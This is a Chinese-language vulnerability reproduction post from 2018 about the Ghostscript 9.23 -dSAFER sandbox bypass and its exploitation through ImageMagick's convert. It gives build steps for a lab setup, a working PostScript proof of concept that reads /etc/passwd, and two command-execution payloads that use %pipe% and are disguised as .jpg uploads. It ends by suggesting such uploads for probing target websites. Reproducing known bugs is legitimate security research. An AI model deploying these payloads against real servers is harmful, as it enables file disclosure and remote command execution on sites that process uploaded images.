GhostScript沙箱绕过命令执行漏洞复现

c0ny1

2018-08-26

一、漏洞信息

项目	描述
漏洞名称	GhostScript 沙箱绕过（命令执行）漏洞
漏洞作者	Tavis Ormandy
CVE编号	暂未分配
漏洞描述	攻击者利用此漏洞可以上传恶意构造的图像文件，当目标服务器在对图像进行裁剪、转换等处理时即会执行攻击者指定的命令。
影响范围	<= 9.23（全版本，全平台）
披露时间	2018-08-21

二、复现环境

OS：Ubuntu 14.10
Ghostscript version：9.23（当下最新版本）
Imagemagic version：7.0.8（当下最新版本）

三、环境搭建

3.1 安装Ghostscript

[email protected] ~$ cd /usr/local
[email protected] /usr/local$ wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs923/ghostscript-9.23.tar.gz
[email protected] /usr/local$ tar zxvf ghostscript-9.23.tar.gz
[email protected] /usr/local$ cd ghostscript-9.23
[email protected] /usr/local/ghostscript-9.23$ ./configure --prefix=/usr
[email protected] /usr/local/ghostscript-9.23$ mkdir obj
[email protected] /usr/local/ghostscript-9.23$ mkdir bin
[email protected] /usr/local/ghostscript-9.23$ make all
[email protected] /usr/local/ghostscript-9.23$ sudo make install
[email protected] /usr/local/ghostscript-9.23$ gs -v #检查是否安装成功
GPL Ghostscript 9.23 (2018-03-21)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.

3.2 安装Imagemagic

[email protected] /usr/local$ wget https://github.com/ImageMagick/ImageMagick/archive/7.0.8-9.tar.gz
[email protected] /usr/local$ tar zxvf 7.0.8-9.tar.gz
[email protected] /usr/local$ cd ImageMagick-7.0.8-9/
[email protected] /usr/local/ImageMagick-7.0.8-9$ ./configure --prefix=/usr
[email protected] /usr/local/ImageMagick-7.0.8-9$ make
[email protected] /usr/local/ImageMagick-7.0.8-9$ make install
[email protected] /usr/local/ImageMagick-7.0.8-9$ sudo ldconfig /usr/local/lib #使用新增的动态链接库生效
[email protected] /usr/local/ImageMagick-7.0.8-9$ convert -version #检查是否安装成功
Version: ImageMagick 7.0.8-9 Q16 i686 2018-08-26 https://www.imagemagick.org
Copyright: ? 1999-2018 ImageMagick Studio LLC
License: https://www.imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP 
Delegates (built-in):

四、漏洞验证

4.1 读文件

读取/etc/passwd文件内容的poc：

/FileToSteal (/etc/passwd) def
errordict /undefinedfilename {
    FileToSteal % save the undefined name
} put
errordict /undefined {
    (STOLEN: ) print
    counttomark {
        ==only
    } repeat
    (\n) print
    FileToSteal
} put
errordict /invalidfileaccess {
    pop
} put
errordict /typecheck {
    pop
} put
FileToSteal (w) .tempfile
statusdict
begin
    1 1 .setpagesize
end
quit

将以上poc保存为poc.ps文件，并执行以下命令。

1	gs -q -sDEVICE=ppmraw -dSAFER poc.ps

图1-执行结果

4.2命令执行

ubuntu poc：

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

centos poc：

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

这里我们是linux是Ubuntu发行版，故选择第一个poc进行测试。将以上poc保存为poc.jpg文件，并执行以下命令,测试对恶意图片文件进行格式转换。

1	/usr/local/bin/convert poc.jpg poc.jpg

图2-执行结果

注意： 漏洞作者的《More Ghostscript Issues: Should we disable PS coders in policy.xml by default?》这篇文章里的convert命令不是ghostscript的，而是它的上游应用。可以是imagemagick，也可以是graphicsmagick。经过测试两个软件的convert命令都存在漏洞,我们这里复测的事imagemagick。

五、总结

ghostscript的上游应用有imagemagick，libmagick，graphicsmagick，gimp，python-matplotlib，texlive-core，texmacs，latex2html，latex2rtf等，其中ImageMagick受该漏洞影响最为严重。有相当多的网站，博客，媒体平台和流行的CMS（WordPress，Drupal等）在使用ImageMagick来进行图像处理。 故在日常渗透测试中，可以上传带有dnslog测试的poc，来测试目标网站是否存在该漏洞。